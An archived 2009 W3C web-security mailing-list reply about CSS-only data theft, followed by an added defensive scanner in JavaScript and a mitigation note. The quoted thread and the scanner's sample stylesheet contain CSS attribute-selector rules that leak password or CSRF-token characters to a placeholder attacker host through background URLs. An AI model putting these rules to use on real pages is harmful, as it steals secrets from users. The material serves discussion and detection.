- From: Adam Barth <w3c@adambarth.com>
- Date: Mon, 7 Dec 2009 12:29:31 -0800
- To: Daniel Glazman <daniel@glazman.org>
- Cc: public-web-security@w3.org
On Mon, Dec 7, 2009 at 12:26 PM, Daniel Glazman <daniel@glazman.org> wrote:
>>
>> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>>
>> create a new type of XSS attacks, and those are purely CSS based XSS
>> attacks.. without JS.. that will allow an attacker to read arbitrary files
>> from the page WITHOUT the need of JS.
>
> Not at all. I repeat: not at all.

I would encourage you to read the full thread before responding. A more compelling risk is the theft of secret tokens used to protect against CSRF. Those are stored in the default value of attributes of input elements.

Adam
Received on Monday, 7 December 2009 20:30:38 UTC
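As an added illustration from the defender's side (not code from the thread or from any of its participants), the following scanner flags stylesheet rules of the shape quoted above: an attribute-substring selector on an input's `value` combined with a `url()` fetch to another origin, which is how a CSRF token sitting in a `value` attribute would be leaked one character at a time. It generalizes beyond the thread's `^=` case to `$=` and `*=`; the rule splitter, the `findExfilRules` function and the sample stylesheet are assumptions constructed for this example.

```javascript
// Added example, not from the thread. Flags CSS rules that pair an attribute-substring
// selector on an input's value with a url() fetch to a foreign origin.
const ATTR_SUBSTRING = /\[\s*value\s*([\^$*]=)\s*(["']?)([^"'\]]*)\2\s*\]/i;
const URL_FETCH = /url\(\s*["']?((?:https?:)?\/\/[^"')\s]+)["']?\s*\)/gi;

// Minimal splitter for flat "selector { declarations }" blocks (constructed helper;
// it ignores nested at-rules, which is enough for this demonstration).
function splitRules(css) {
  const rules = [];
  const stripped = css.replace(/\/\*[\s\S]*?\*\//g, "");
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(stripped)) !== null) {
    rules.push({ selector: m[1].trim(), body: m[2].trim() });
  }
  return rules;
}

// Returns one finding per (value-substring selector, foreign url()) pair.
function findExfilRules(css, pageOrigin) {
  const findings = [];
  for (const rule of splitRules(css)) {
    const sel = ATTR_SUBSTRING.exec(rule.selector);
    if (!sel) continue; // not probing an input's value attribute
    URL_FETCH.lastIndex = 0;
    let u;
    while ((u = URL_FETCH.exec(rule.body)) !== null) {
      // Scheme-relative "//host/..." resolves to the page's scheme; assume https here.
      const href = u[1].startsWith("//") ? "https:" + u[1] : u[1];
      if (new URL(href).origin !== pageOrigin) {
        findings.push({ selector: rule.selector, operator: sel[1], prefix: sel[3], url: u[1] });
      }
    }
  }
  return findings;
}

// Constructed sample stylesheet: one benign rule, then two rules in the shape discussed
// in the thread, aimed at a CSRF token stored in an input's value attribute.
const SAMPLE_CSS = `
input[type=text] { border: 1px solid #ccc; background: url("/img/bg.png"); }
/* token probe */
input[name=csrf_token][value^="a"] { background: url("//attacker.example/t=a"); }
input[name=csrf_token][value^="b"] { background: url("//attacker.example/t=b"); }
`;

// Example run (assumed page origin): reports the two probe rules, not the benign one.
const REPORT = findExfilRules(SAMPLE_CSS, "https://bank.example");
```

A response `Content-Security-Policy` with a restrictive `img-src` directive blocks the background-image fetch itself, which is the simplest mitigation when untrusted stylesheets cannot be kept off the page.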